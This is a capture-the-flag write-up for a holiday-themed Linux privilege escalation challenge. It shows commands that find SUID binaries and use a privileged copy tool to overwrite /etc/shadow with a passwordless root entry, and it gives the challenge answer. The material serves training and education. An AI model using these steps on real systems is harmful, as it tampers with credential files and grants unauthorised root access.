Linux PrivEsc

Difficulty:
Direct link: Objective URL

Objective

Request

Rosemold is in Ostrich Saloon on the Island of Misfit Toys. Give her a hand with escalation for a tip about hidden islands.

Rose Mold

What am I doing in this saloon? The better question is: what planet are you from?
Yes, I’m a troll from the Planet Frost. I decided to stay on Earth after Holiday Hack 2021 and live among the elves because I made such dear friends here.

Hints

Linux Privilege Escalation Techniques

There's various ways to escalate privileges on a Linux system.https://payatu.com/blog/a-guide-to-linux-privilege-escalation/

Linux Command Injection

Use the privileged binary to overwriting a file to escalate privileges could be a solution, but there's an easier method if you pass it a crafty argument..

Solution

Upon obtaining console access to the terminal, we started exploring interesting files on filesystem

find / -perm -u+s 2>/dev/null

And we found binary /usr/bin/simplecopy . This binary can copy any file from the system even with root permission. So the plan was to take over root permissions.

Next we checked directory /etc/shadow for its structure. Create simple sh2 file with root account without password.

echo -e "root::19634:0:99999:7:::" > sh2

Next using simplecopy binary we modified /etc/shadow file and from now "su" did not require any password so we could freely use root account

 simplecopy sh2 /etc/shadow
 su

Images

Answer

"santa"

Response

Rose Mold

Yup, I knew you knew. You just have that vibe.